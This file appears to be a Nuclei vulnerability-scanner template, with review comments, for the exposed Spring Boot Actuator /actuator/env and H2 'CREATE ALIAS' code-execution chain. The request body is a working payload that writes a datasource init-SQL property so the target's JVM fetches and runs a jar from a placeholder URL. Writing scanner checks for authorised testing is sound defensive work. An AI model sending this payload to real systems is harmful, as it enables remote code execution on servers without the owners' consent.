# Nuclei template: pushes an H2 `CREATE ALIAS` payload into the
# spring.datasource.hikari.connection-init-sql property via a writable
# Spring Boot Actuator /actuator/env endpoint.
#
# NOTE(review): this is an intrusive check, not a passive fingerprint. On a
# matching target the runtime environment is modified and the property is
# left set after the scan; judging by the property name, HikariCP/H2 will run
# the injected SQL whenever a new pooled connection is initialised. The
# references chain this write with further actuator calls to obtain code
# execution — this template performs only the write. Run with authorisation
# and expect the datasource on the target to be disturbed afterwards.
id: springboot-h2-db-rce

info:
  name: Spring Boot H2 Database RCE
  author: dwisiswant0
  # "critical" reflects the impact of a writable, credential-free env
  # endpoint; the template itself does not prove that code ran (see matchers).
  severity: critical
  # Payload taken from @pyn3rd (Twitter), see reference [2].
  # References:
  # - [1] https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database
  # - [2] https://twitter.com/pyn3rd/status/1305151887964946432
  # - [3] https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
  # - [4] https://github.com/spaceraccoon/spring-boot-actuator-h2-rce

requests:
  # Single POST to the env endpoint; no Authorization header is sent, so a
  # match also implies the endpoint accepted the write without credentials
  # from this request (scanner-level headers, if any, are not visible here).
  - method: POST
    path:
      - "{{BaseURL}}/actuator/env"
    headers:
      Content-Type: "application/json"
    # JSON body in the Spring Boot 2 env-write shape ({"name":..., "value":...}).
    # The value is H2 source-code alias syntax: text before `@CODE` is the
    # Java import list, text after it is the method body. The method builds a
    # URLClassLoader over http://127.0.0.1:9001/pop.jar, loads class `pop`
    # with initialisation enabled, and calls newInstance() — i.e. any static
    # initialiser or no-arg constructor in that class runs inside the target
    # JVM. The URL is resolved from the *target's* point of view: as written
    # it is a loopback placeholder, so the load fails unless the operator
    # replaces it with a host the target can reach (and serves a real jar).
    # Keep the `\"` escapes exactly — the block scalar is literal, so they
    # are JSON string escapes, not YAML ones.
    body: |
      {
      "name": "spring.datasource.hikari.connection-init-sql",
      "value":"CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName(\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$; CALL remoteUrl()"
      }

    # All three matchers must hold. Together they establish only that the
    # property write was accepted and echoed back in an actuator-typed 200
    # response. They do NOT establish code execution: nothing in this
    # template opens a new H2 connection, so a hit means "env endpoint is
    # writable", not "payload ran". Treat it as a lead to confirm manually.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      # Response body echoes the written key; the trailing `":"` anchors on
      # the key being followed by a string value rather than a bare mention.
      - type: word
        words:
          - "\"spring.datasource.hikari.connection-init-sql\":\""
        # Redundant with a single word (there is nothing to AND); harmless.
        condition: and
        part: body
      # Actuator responses carry a vendor content type; this filters out
      # generic 200s from unrelated handlers at the same path.
      - type: word
        words:
          - "application/vnd.spring-boot.actuator"
        part: header